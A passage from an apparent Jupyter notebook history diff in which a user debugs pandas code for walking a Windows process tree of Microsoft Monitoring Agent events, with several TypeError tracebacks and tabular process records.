\nc:\\program files\\microsoft monitoring agent\\age...       S-1-5-18   \n\n                                                     SubjectUserName  \\\nproc_key                                                               \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1$   \n\n                                                   SubjectDomainName  \\\nproc_key                                                               \nc:\\program files\\microsoft monitoring agent\\age...         WORKGROUP   \nc:\\program files\\microsoft monitoring agent\\age...         WORKGROUP   \nc:\\program files\\microsoft monitoring agent\\age...         WORKGROUP   \nc:\\program files\\microsoft monitoring agent\\age...         WORKGROUP   \nc:\\program files\\microsoft monitoring agent\\age...         WORKGROUP   \nc:\\program files\\microsoft monitoring agent\\age...         WORKGROUP   \nc:\\program files\\microsoft monitoring agent\\age...         WORKGROUP   \nc:\\program files\\microsoft monitoring agent\\age...         WORKGROUP   \nc:\\program files\\microsoft monitoring agent\\age...         WORKGROUP   \nc:\\program files\\microsoft monitoring agent\\age...         WORKGROUP   \nc:\\program files\\microsoft monitoring agent\\age...         WORKGROUP   \nc:\\program files\\microsoft monitoring agent\\age...         WORKGROUP   \n\n                                                   SubjectLogonId  \\\nproc_key                                                            \nc:\\program files\\microsoft monitoring agent\\age...          0x3e7   \nc:\\program files\\microsoft monitoring agent\\age...          0x3e7   \nc:\\program files\\microsoft monitoring agent\\age...          0x3e7   \nc:\\program files\\microsoft monitoring agent\\age...          0x3e7   \nc:\\program files\\microsoft monitoring agent\\age...          0x3e7   \nc:\\program files\\microsoft monitoring agent\\age...          0x3e7   \nc:\\program files\\microsoft monitoring agent\\age...          0x3e7   \nc:\\program files\\microsoft monitoring agent\\age...          0x3e7   \nc:\\program files\\microsoft monitoring agent\\age...          0x3e7   \nc:\\program files\\microsoft monitoring agent\\age...          0x3e7   \nc:\\program files\\microsoft monitoring agent\\age...          0x3e7   \nc:\\program files\\microsoft monitoring agent\\age...          0x3e7   \n\n                                                   NewProcessId  ...  \\\nproc_key                                                         ...   \nc:\\program files\\microsoft monitoring agent\\age...       0x15c8  ...   \nc:\\program files\\microsoft monitoring agent\\age...        0xcd8  ...   \nc:\\program files\\microsoft monitoring agent\\age...        0x8dc  ...   \nc:\\program files\\microsoft monitoring agent\\age...        0xbd0  ...   \nc:\\program files\\microsoft monitoring agent\\age...        0xe34  ...   \nc:\\program files\\microsoft monitoring agent\\age...        0x53c  ...   \nc:\\program files\\microsoft monitoring agent\\age...        0xef4  ...   \nc:\\program files\\microsoft monitoring agent\\age...        0xd74  ...   \nc:\\program files\\microsoft monitoring agent\\age...        0x6f8  ...   \nc:\\program files\\microsoft monitoring agent\\age...       0x1fc0  ...   \nc:\\program files\\microsoft monitoring agent\\age...       0x10bc  ...   \nc:\\program files\\microsoft monitoring agent\\age...        0xb48  ...   \n\n                                                   source_index_par  \\\nproc_key                                                              \nc:\\program files\\microsoft monitoring agent\\age...              NaN   \nc:\\program files\\microsoft monitoring agent\\age...              NaN   \nc:\\program files\\microsoft monitoring agent\\age...              NaN   \nc:\\program files\\microsoft monitoring agent\\age...              NaN   \nc:\\program files\\microsoft monitoring agent\\age...              NaN   \nc:\\program files\\microsoft monitoring agent\\age...              NaN   \nc:\\program files\\microsoft monitoring agent\\age...              NaN   \nc:\\program files\\microsoft monitoring agent\\age...              NaN   \nc:\\program files\\microsoft monitoring agent\\age...              NaN   \nc:\\program files\\microsoft monitoring agent\\age...              NaN   \nc:\\program files\\microsoft monitoring agent\\age...              NaN   \nc:\\program files\\microsoft monitoring agent\\age...              NaN   \n\n                                                   ProcessId_par  \\\nproc_key                                                           \nc:\\program files\\microsoft monitoring agent\\age...           NaN   \nc:\\program files\\microsoft monitoring agent\\age...           NaN   \nc:\\program files\\microsoft monitoring agent\\age...           NaN   \nc:\\program files\\microsoft monitoring agent\\age...           NaN   \nc:\\program files\\microsoft monitoring agent\\age...           NaN   \nc:\\program files\\microsoft monitoring agent\\age...           NaN   \nc:\\program files\\microsoft monitoring agent\\age...           NaN   \nc:\\program files\\microsoft monitoring agent\\age...           NaN   \nc:\\program files\\microsoft monitoring agent\\age...           NaN   \nc:\\program files\\microsoft monitoring agent\\age...           NaN   \nc:\\program files\\microsoft monitoring agent\\age...           NaN   \nc:\\program files\\microsoft monitoring agent\\age...           NaN   \n\n                                                   NewProcessName_par  \\\nproc_key                                                                \nc:\\program files\\microsoft monitoring agent\\age...                NaN   \nc:\\program files\\microsoft monitoring agent\\age...                NaN   \nc:\\program files\\microsoft monitoring agent\\age...                NaN   \nc:\\program files\\microsoft monitoring agent\\age...                NaN   \nc:\\program files\\microsoft monitoring agent\\age...                NaN   \nc:\\program files\\microsoft monitoring agent\\age...                NaN   \nc:\\program files\\microsoft monitoring agent\\age...                NaN   \nc:\\program files\\microsoft monitoring agent\\age...                NaN   \nc:\\program files\\microsoft monitoring agent\\age...                NaN   \nc:\\program files\\microsoft monitoring agent\\age...                NaN   \nc:\\program files\\microsoft monitoring agent\\age...                NaN   \nc:\\program files\\microsoft monitoring agent\\age...                NaN   \n\n                                                   TimeGenerated_orig_par  \\\nproc_key                                                                    \nc:\\program files\\microsoft monitoring agent\\age...             1970-01-01   \nc:\\program files\\microsoft monitoring agent\\age...             1970-01-01   \nc:\\program files\\microsoft monitoring agent\\age...             1970-01-01   \nc:\\program files\\microsoft monitoring agent\\age...             1970-01-01   \nc:\\program files\\microsoft monitoring agent\\age...             1970-01-01   \nc:\\program files\\microsoft monitoring agent\\age...             1970-01-01   \nc:\\program files\\microsoft monitoring agent\\age...             1970-01-01   \nc:\\program files\\microsoft monitoring agent\\age...             1970-01-01   \nc:\\program files\\microsoft monitoring agent\\age...             1970-01-01   \nc:\\program files\\microsoft monitoring agent\\age...             1970-01-01   \nc:\\program files\\microsoft monitoring agent\\age...             1970-01-01   \nc:\\program files\\microsoft monitoring agent\\age...             1970-01-01   \n\n                                                                                           parent_key  \\\nproc_key                                                                                                \nc:\\program files\\microsoft monitoring agent\\age...  c:\\program files\\microsoft monitoring agent\\ag...   \nc:\\program files\\microsoft monitoring agent\\age...  c:\\program files\\microsoft monitoring agent\\ag...   \nc:\\program files\\microsoft monitoring agent\\age...  c:\\program files\\microsoft monitoring agent\\ag...   \nc:\\program files\\microsoft monitoring agent\\age...  c:\\program files\\microsoft monitoring agent\\ag...   \nc:\\program files\\microsoft monitoring agent\\age...  c:\\program files\\microsoft monitoring agent\\ag...   \nc:\\program files\\microsoft monitoring agent\\age...  c:\\program files\\microsoft monitoring agent\\ag...   \nc:\\program files\\microsoft monitoring agent\\age...  c:\\program files\\microsoft monitoring agent\\ag...   \nc:\\program files\\microsoft monitoring agent\\age...  c:\\program files\\microsoft monitoring agent\\ag...   \nc:\\program files\\microsoft monitoring agent\\age...  c:\\program files\\microsoft monitoring agent\\ag...   \nc:\\program files\\microsoft monitoring agent\\age...  c:\\program files\\microsoft monitoring agent\\ag...   \nc:\\program files\\microsoft monitoring agent\\age...  c:\\program files\\microsoft monitoring agent\\ag...   \nc:\\program files\\microsoft monitoring agent\\age...  c:\\program files\\microsoft monitoring agent\\ag...   \n\n                                                   IsRoot IsLeaf IsBranch  \\\nproc_key                                                                    \nc:\\program files\\microsoft monitoring agent\\age...  False  False     True   \nc:\\program files\\microsoft monitoring agent\\age...  False  False     True   \nc:\\program files\\microsoft monitoring agent\\age...  False  False     True   \nc:\\program files\\microsoft monitoring agent\\age...  False  False     True   \nc:\\program files\\microsoft monitoring agent\\age...  False  False     True   \nc:\\program files\\microsoft monitoring agent\\age...  False  False     True   \nc:\\program files\\microsoft monitoring agent\\age...  False  False     True   \nc:\\program files\\microsoft monitoring agent\\age...  False  False     True   \nc:\\program files\\microsoft monitoring agent\\age...  False  False     True   \nc:\\program files\\microsoft monitoring agent\\age...  False  False     True   \nc:\\program files\\microsoft monitoring agent\\age...  False  False     True   \nc:\\program files\\microsoft monitoring agent\\age...  False  False     True   \n\n                                                        path parent_index  \nproc_key                                                                   \nc:\\program files\\microsoft monitoring agent\\age...    1004/5         1004  \nc:\\program files\\microsoft monitoring agent\\age...    1004/8         1004  \nc:\\program files\\microsoft monitoring agent\\age...   1004/10         1004  \nc:\\program files\\microsoft monitoring agent\\age...   1004/15         1004  \nc:\\program files\\microsoft monitoring agent\\age...   1004/67         1004  \nc:\\program files\\microsoft monitoring agent\\age...   1004/76         1004  \nc:\\program files\\microsoft monitoring agent\\age...   1004/78         1004  \nc:\\program files\\microsoft monitoring agent\\age...  1004/107         1004  \nc:\\program files\\microsoft monitoring agent\\age...  1004/120         1004  \nc:\\program files\\microsoft monitoring agent\\age...  1004/127         1004  \nc:\\program files\\microsoft monitoring agent\\age...  1004/129         1004  \nc:\\program files\\microsoft monitoring agent\\age...  1004/139         1004  \n\n[12 rows x 35 columns]"
+       },
+       "execution_count": 63,
+       "metadata": {},
+       "output_type": "execute_result"
+      }
+     ],
+     "persistentId": "2cb7192e-4b90-4e32-a0f6-5017896f5d7c",
+     "text": "parent = ptutil.get_parent(p_tree, children2.iloc[0])\nproc = ptutil.get_process(p_tree, children2.iloc[0])\nsiblings = ptutil.get_children(p_tree, parent, include_source=False)\nsiblings\n#     if not include_source:\n#         return siblings.loc[~proc]\n#     return siblings"
+    },
+    "executionTime": "2019-12-13T21:11:02.763Z"
+   },
+   {
+    "cell": {
+     "executionCount": 64,
+     "executionEventId": "e1d75807-599d-41da-a9ec-0005795789e0",
+     "hasError": true,
+     "id": "8b106c58-d787-4dee-8e64-c1e9a1b7f1e7",
+     "outputs": [
+      {
+       "ename": "TypeError",
+       "evalue": "bad operand type for unary ~: 'str'",
+       "output_type": "error",
+       "traceback": [
+        "\u001b[1;31m---------------------------------------------------------------------------\u001b[0m",
+        "\u001b[1;31mTypeError\u001b[0m                                 Traceback (most recent call last)",
+        "\u001b[1;32m<ipython-input-64-6cc85f698aaa>\u001b[0m in \u001b[0;36m<module>\u001b[1;34m\u001b[0m\n\u001b[0;32m      2\u001b[0m \u001b[0mproc\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mptutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_process\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mp_tree\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mchildren2\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0miloc\u001b[0m\u001b[1;33m[\u001b[0m\u001b[1;36m0\u001b[0m\u001b[1;33m]\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m      3\u001b[0m \u001b[0msiblings\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mptutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_children\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mp_tree\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mparent\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0minclude_source\u001b[0m\u001b[1;33m=\u001b[0m\u001b[1;32mFalse\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m----> 4\u001b[1;33m \u001b[0msiblings\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mloc\u001b[0m\u001b[1;33m[\u001b[0m\u001b[1;33m~\u001b[0m\u001b[0mproc\u001b[0m\u001b[1;33m]\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m      5\u001b[0m \u001b[1;31m#     if not include_source:\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m      6\u001b[0m \u001b[1;31m#         return siblings.loc[~proc]\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n",
+        "\u001b[1;32m~\\AppData\\Local\\Continuum\\anaconda3\\lib\\site-packages\\pandas\\core\\generic.py\u001b[0m in \u001b[0;36m__invert__\u001b[1;34m(self)\u001b[0m\n\u001b[0;32m   1539\u001b[0m     \u001b[1;32mdef\u001b[0m \u001b[0m__invert__\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mself\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m   1540\u001b[0m         \u001b[1;32mtry\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m-> 1541\u001b[1;33m             \u001b[0marr\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0moperator\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0minv\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mcom\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mvalues_from_object\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mself\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m   1542\u001b[0m             \u001b[1;32mreturn\u001b[0m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m__array_wrap__\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0marr\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m   1543\u001b[0m         \u001b[1;32mexcept\u001b[0m \u001b[0mException\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n",
+        "\u001b[1;31mTypeError\u001b[0m: bad operand type for unary ~: 'str'"
+       ]
+      }
+     ],
+     "persistentId": "2cb7192e-4b90-4e32-a0f6-5017896f5d7c",
+     "text": "parent = ptutil.get_parent(p_tree, children2.iloc[0])\nproc = ptutil.get_process(p_tree, children2.iloc[0])\nsiblings = ptutil.get_children(p_tree, parent, include_source=False)\nsiblings.loc[~proc]\n#     if not include_source:\n#         return siblings.loc[~proc]\n#     return siblings"
+    },
+    "executionTime": "2019-12-13T21:11:15.384Z"
+   },
+   {
+    "cell": {
+     "executionCount": 65,
+     "executionEventId": "63c1ae0f-8040-4d2c-b379-d266a3f47fd9",
+     "hasError": false,
+     "id": "fc64ecac-8791-4324-87f4-7ebb47f5b1ef",
+     "outputs": [
+      {
+       "data": {
+        "text/plain": "TenantId                               52b1ab41-869e-4138-9e40-2a4457f09bf0\nAccount                                          WORKGROUP\\MSTICAlertsWin1$\nEventID                                                                4688\nTimeGenerated                                    2019-02-09 20:32:56.260000\nComputer                                                    MSTICAlertsWin1\nSubjectUserSid                                                     S-1-5-18\nSubjectUserName                                            MSTICAlertsWin1$\nSubjectDomainName                                                 WORKGROUP\nSubjectLogonId                                                        0x3e7\nNewProcessId                                                         0x15c8\nNewProcessName            C:\\Program Files\\Microsoft Monitoring Agent\\Ag...\nTokenElevationType                                                   %%1936\nProcessId                                                             0x864\nCommandLine               \"C:\\Program Files\\Microsoft Monitoring Agent\\A...\nParentProcessName         C:\\Program Files\\Microsoft Monitoring Agent\\Ag...\nTargetLogonId                                                           0x0\nSourceComputerId                       263a788b-6526-4cdc-8ed9-d79402fe4aa0\nTimeCreatedUtc                                   2019-02-09 20:32:56.260000\nEffectiveLogonId                                                      0x3e7\nnew_process_lc            c:\\program files\\microsoft monitoring agent\\ag...\nparent_proc_lc            c:\\program files\\microsoft monitoring agent\\ag...\nsource_index                                                              5\nNewProcessId_par                                                      0x864\nEffectiveLogonId_par                                                  0x3e7\nnew_process_lc_par        c:\\program files\\microsoft monitoring agent\\ag...\nsource_index_par                                                        NaN\nProcessId_par                                                           NaN\nNewProcessName_par                                                      NaN\nTimeGenerated_orig_par                                  1970-01-01 00:00:00\nparent_key                c:\\program files\\microsoft monitoring agent\\ag...\nIsRoot                                                                False\nIsLeaf                                                                False\nIsBranch                                                               True\npath                                                                 1004/5\nparent_index                                                           1004\nName: c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0x15c82019-02-09 20:32:56.260000, dtype: object"
+       },
+       "execution_count": 65,
+       "metadata": {},
+       "output_type": "execute_result"
+      }
+     ],
+     "persistentId": "56ffc00b-0809-4b5f-b6b9-bec57f7e8332",
+     "text": "proc"
+    },
+    "executionTime": "2019-12-13T21:11:33.280Z"
+   },
+   {
+    "cell": {
+     "executionCount": 66,
+     "executionEventId": "0de02c10-9a81-4826-92c8-ac27a3391363",
+     "hasError": false,
+     "id": "fc64ecac-8791-4324-87f4-7ebb47f5b1ef",
+     "outputs": [
+      {
+       "data": {
+        "text/plain": "'c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x15c82019-02-09 20:32:56.260000'"
+       },
+       "execution_count": 66,
+       "metadata": {},
+       "output_type": "execute_result"
+      }
+     ],
+     "persistentId": "56ffc00b-0809-4b5f-b6b9-bec57f7e8332",
+     "text": "proc.name"
+    },
+    "executionTime": "2019-12-13T21:11:38.258Z"
+   },
+   {
+    "cell": {
+     "executionCount": 67,
+     "executionEventId": "03a4f3ac-1ad1-42dc-89e3-86758657220b",
+     "hasError": true,
+     "id": "8b106c58-d787-4dee-8e64-c1e9a1b7f1e7",
+     "outputs": [
+      {
+       "ename": "TypeError",
+       "evalue": "bad operand type for unary ~: 'str'",
+       "output_type": "error",
+       "traceback": [
+        "\u001b[1;31m---------------------------------------------------------------------------\u001b[0m",
+        "\u001b[1;31mTypeError\u001b[0m                                 Traceback (most recent call last)",
+        "\u001b[1;32m<ipython-input-67-fe00384cb889>\u001b[0m in \u001b[0;36m<module>\u001b[1;34m\u001b[0m\n\u001b[0;32m      2\u001b[0m \u001b[0mproc\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mptutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_process\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mp_tree\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mchildren2\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0miloc\u001b[0m\u001b[1;33m[\u001b[0m\u001b[1;36m0\u001b[0m\u001b[1;33m]\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m      3\u001b[0m \u001b[0msiblings\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mptutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_children\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mp_tree\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mparent\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0minclude_source\u001b[0m\u001b[1;33m=\u001b[0m\u001b[1;32mFalse\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m----> 4\u001b[1;33m \u001b[0msiblings\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mloc\u001b[0m\u001b[1;33m[\u001b[0m\u001b[1;33m~\u001b[0m\u001b[0mproc\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mname\u001b[0m\u001b[1;33m]\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m      5\u001b[0m \u001b[1;31m#     if not include_source:\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m      6\u001b[0m \u001b[1;31m#         return siblings.loc[~proc]\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n",
+        "\u001b[1;31mTypeError\u001b[0m: bad operand type for unary ~: 'str'"
+       ]
+      }
+     ],
+     "persistentId": "2cb7192e-4b90-4e32-a0f6-5017896f5d7c",
+     "text": "parent = ptutil.get_parent(p_tree, children2.iloc[0])\nproc = ptutil.get_process(p_tree, children2.iloc[0])\nsiblings = ptutil.get_children(p_tree, parent, include_source=False)\nsiblings.loc[~proc.name]\n#     if not include_source:\n#         return siblings.loc[~proc]\n#     return siblings"
+    },
+    "executionTime": "2019-12-13T21:11:45.385Z"
+   },
+   {
+    "cell": {
+     "executionCount": 68,
+     "executionEventId": "9cce4ddc-8d14-4071-9fb0-08adde8b568e",
+     "hasError": false,
+     "id": "8b106c58-d787-4dee-8e64-c1e9a1b7f1e7",
+     "outputs": [
+      {
+       "data": {
+        "text/plain": "TenantId                               52b1ab41-869e-4138-9e40-2a4457f09bf0\nAccount                                          WORKGROUP\\MSTICAlertsWin1$\nEventID                                                                4688\nTimeGenerated                                    2019-02-09 20:32:56.260000\nComputer                                                    MSTICAlertsWin1\nSubjectUserSid                                                     S-1-5-18\nSubjectUserName                                            MSTICAlertsWin1$\nSubjectDomainName                                                 WORKGROUP\nSubjectLogonId                                                        0x3e7\nNewProcessId                                                         0x15c8\nNewProcessName            C:\\Program Files\\Microsoft Monitoring Agent\\Ag...\nTokenElevationType                                                   %%1936\nProcessId                                                             0x864\nCommandLine               \"C:\\Program Files\\Microsoft Monitoring Agent\\A...\nParentProcessName         C:\\Program Files\\Microsoft Monitoring Agent\\Ag...\nTargetLogonId                                                           0x0\nSourceComputerId                       263a788b-6526-4cdc-8ed9-d79402fe4aa0\nTimeCreatedUtc                                   2019-02-09 20:32:56.260000\nEffectiveLogonId                                                      0x3e7\nnew_process_lc            c:\\program files\\microsoft monitoring agent\\ag...\nparent_proc_lc            c:\\program files\\microsoft monitoring agent\\ag...\nsource_index                                                              5\nNewProcessId_par                                                      0x864\nEffectiveLogonId_par                                                  0x3e7\nnew_process_lc_par        c:\\program files\\microsoft monitoring agent\\ag...\nsource_index_par                                                        NaN\nProcessId_par                                                           NaN\nNewProcessName_par                                                      NaN\nTimeGenerated_orig_par                                  1970-01-01 00:00:00\nparent_key                c:\\program files\\microsoft monitoring agent\\ag...\nIsRoot                                                                False\nIsLeaf                                                                False\nIsBranch                                                               True\npath                                                                 1004/5\nparent_index                                                           1004\nName: c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0x15c82019-02-09 20:32:56.260000, dtype: object"
+       },
+       "execution_count": 68,
+       "metadata": {},
+       "output_type": "execute_result"
+      }
+     ],
+     "persistentId": "2cb7192e-4b90-4e32-a0f6-5017896f5d7c",
+     "text": "parent = ptutil.get_parent(p_tree, children2.iloc[0])\nproc = ptutil.get_process(p_tree, children2.iloc[0])\nsiblings = ptutil.get_children(p_tree, parent, include_source=False)\nsiblings.loc[proc.name]\n#     if not include_source:\n#         return siblings.loc[~proc]\n#     return siblings"
+    },
+    "executionTime": "2019-12-13T21:12:30.343Z"
+   },
+   {
+    "cell": {
+     "executionCount": 69,
+     "executionEventId": "2fb2e9d7-b0cc-4305-a986-934623e11f04",
+     "hasError": true,
+     "id": "8b106c58-d787-4dee-8e64-c1e9a1b7f1e7",
+     "outputs": [
+      {
+       "ename": "TypeError",
+       "evalue": "bad operand type for unary ~: 'str'",
+       "output_type": "error",
+       "traceback": [
+        "\u001b[1;31m---------------------------------------------------------------------------\u001b[0m",
+        "\u001b[1;31mTypeError\u001b[0m                                 Traceback (most recent call last)",
+        "\u001b[1;32m<ipython-input-69-c69d06f877b4>\u001b[0m in \u001b[0;36m<module>\u001b[1;34m\u001b[0m\n\u001b[0;32m      2\u001b[0m \u001b[0mproc\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mptutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_process\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mp_tree\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mchildren2\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0miloc\u001b[0m\u001b[1;33m[\u001b[0m\u001b[1;36m0\u001b[0m\u001b[1;33m]\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m      3\u001b[0m \u001b[0msiblings\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mptutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_children\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mp_tree\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mparent\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0minclude_source\u001b[0m\u001b[1;33m=\u001b[0m\u001b[1;32mFalse\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m----> 4\u001b[1;33m \u001b[0msiblings\u001b[0m\u001b[1;33m[\u001b[0m\u001b[1;33m~\u001b[0m\u001b[0msiblings\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mloc\u001b[0m\u001b[1;33m[\u001b[0m\u001b[0mproc\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mname\u001b[0m\u001b[1;33m]\u001b[0m\u001b[1;33m]\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m      5\u001b[0m \u001b[1;31m#     if not include_source:\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m      6\u001b[0m \u001b[1;31m#         return siblings.loc[~proc]\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n",
+        "\u001b[1;32m~\\AppData\\Local\\Continuum\\anaconda3\\lib\\site-packages\\pandas\\core\\generic.py\u001b[0m in \u001b[0;36m__invert__\u001b[1;34m(self)\u001b[0m\n\u001b[0;32m   1539\u001b[0m     \u001b[1;32mdef\u001b[0m \u001b[0m__invert__\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mself\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m   1540\u001b[0m         \u001b[1;32mtry\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m-> 1541\u001b[1;33m             \u001b[0marr\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0moperator\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0minv\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mcom\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mvalues_from_object\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mself\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m   1542\u001b[0m             \u001b[1;32mreturn\u001b[0m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m__array_wrap__\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0marr\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m   1543\u001b[0m         \u001b[1;32mexcept\u001b[0m \u001b[0mException\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n",
+        "\u001b[1;31mTypeError\u001b[0m: bad operand type for unary ~: 'str'"
+       ]
+      }
+     ],
+     "persistentId": "2cb7192e-4b90-4e32-a0f6-5017896f5d7c",
+     "text": "parent = ptutil.get_parent(p_tree, children2.iloc[0])\nproc = ptutil.get_process(p_tree, children2.iloc[0])\nsiblings = ptutil.get_children(p_tree, parent, include_source=False)\nsiblings[~siblings.loc[proc.name]]\n#     if not include_source:\n#         return siblings.loc[~proc]\n#     return siblings"
+    },
+    "executionTime": "2019-12-13T21:12:56.184Z"
+   },
+   {
+    "cell": {
+     "executionCount": 70,
+     "executionEventId": "443e7ba1-c054-46ce-b1d3-ce39fb94b40e",
+     "hasError": false,
+     "id": "8b106c58-d787-4dee-8e64-c1e9a1b7f1e7",
+     "outputs": [
+      {
+       "data": {
